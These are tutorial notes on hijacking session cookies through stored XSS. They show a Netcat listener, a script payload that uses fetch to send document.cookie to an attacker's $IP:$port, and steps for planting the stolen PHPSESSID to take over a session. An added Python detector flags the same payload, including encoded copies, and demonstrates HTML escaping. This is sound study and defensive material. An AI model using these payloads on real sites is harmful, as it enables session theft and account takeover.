Cookie Hijacking

When the application is vulnerable to XSS, we can try to hijack cookies, such as session tokens, that are stored on the client side.

Here we find an example of this scenario:

  • In an active session we go to the Inspect > Application > Cookies tab and check the values that are being stored

Example Output
Name               Value                              HttpOnly
...                ...                                ...
PHPSESSID          e15df96b271a9729837c2bb206b522c7
...                ...                                ...
  • If the HttpOnly flag is unchecked, JavaScript running on the page can read the cookie through document.cookie

  • PHPSESSID is the default session cookie name on PHP-handled pages


  • If we cannot see it directly, we can assume it is configured this way and try to send the cookie values to our own machine. For this, we open a listener port with Netcat

nc -nlvp $port

  • We can attempt the cookie hijack through the part of the application vulnerable to stored XSS

#We fill the form with the payload (URL scheme and query separator added so the request actually reaches the listener)
<script>fetch("http://$IP:$port/?c=" + document.cookie);</script>
#The request that arrives at the listener carries the cookie values in its URL

$IP and $port are the address of our machine and the port opened with Netcat.
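From the defender's side, the stored payload above is a recognisable pattern: a read of document.cookie combined with a network call. The script below is an added example, not part of the original notes; it classifies submitted form input as a cookie-exfiltration attempt, a generic script injection, or clean, after undoing URL and HTML-entity encoding. It is a detection signal only, and the mitigation it pairs with is contextual output encoding (shown in escape_for_html). The sample submissions and the 203.0.113.5 address are constructed.

```python
"""Flag submitted input that looks like a cookie-exfiltration XSS payload.

Added example (not from the original notes). Detecting the pattern does not
fix the bug; escaping user input before it is reflected into HTML does.
The sample submissions below are constructed.
"""
import html
import re
from urllib.parse import unquote

COOKIE_READ = re.compile(r"document\s*\.\s*cookie", re.I)
# Network APIs a script can use to send data to another host.
EXFIL_SINK = re.compile(r"\b(fetch|XMLHttpRequest|navigator\.sendBeacon)\b", re.I)
# Markup that puts input into a script execution context (heuristic, may false-positive on prose).
SCRIPT_CTX = re.compile(r"<\s*script\b|\bon[a-z]+\s*=|javascript:", re.I)


def normalize(text: str) -> str:
    """Decode URL and HTML-entity encoding a few times so simple encoding does not hide the pattern."""
    for _ in range(3):
        text = html.unescape(unquote(text))
    return text


def classify(submission: str) -> str:
    """Return 'cookie-exfil', 'script-injection' or 'clean' for one submitted value."""
    t = normalize(submission)
    reads_cookie = bool(COOKIE_READ.search(t))
    has_sink = bool(EXFIL_SINK.search(t))
    has_script = bool(SCRIPT_CTX.search(t))
    if reads_cookie and has_sink:
        return "cookie-exfil"
    if has_script:
        return "script-injection"
    return "clean"


def escape_for_html(submission: str) -> str:
    """The actual mitigation: encode before reflecting into an HTML body, so the input never executes."""
    return html.escape(submission, quote=True)


# Constructed samples: benign text, the page's payload, the same payload URL-encoded, harmless markup.
SAMPLE_SUBMISSIONS = [
    "Great article, thanks!",
    '<script>fetch("http://203.0.113.5:4444/?c=" + document.cookie);</script>',
    "%3Cscript%3Efetch(%22http%3A//203.0.113.5%3A4444/%3Fc%3D%22%2Bdocument.cookie)%3C/script%3E",
    "<b>bold</b> only",
]

if __name__ == "__main__":
    for s in SAMPLE_SUBMISSIONS:
        print(f"{classify(s):17} {escape_for_html(normalize(s))[:60]}")
```

Because the check runs on the decoded value, an encoded copy of the payload is classified the same way as the plain one; the escaped output shows what the browser would receive once the comment is rendered with encoding applied, which is inert text rather than a script.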


  • Once we have the cookie value we go to the website, open the Inspect > Application > Cookies tab, and set the cookie value manually. After that, we reload the page so the browser picks up the new value

Name               Value
...                ...
PHPSESSID          $hijackedCookie     #We set the cookie obtained
...                ...
#This logs us into the stolen session without needing credentials
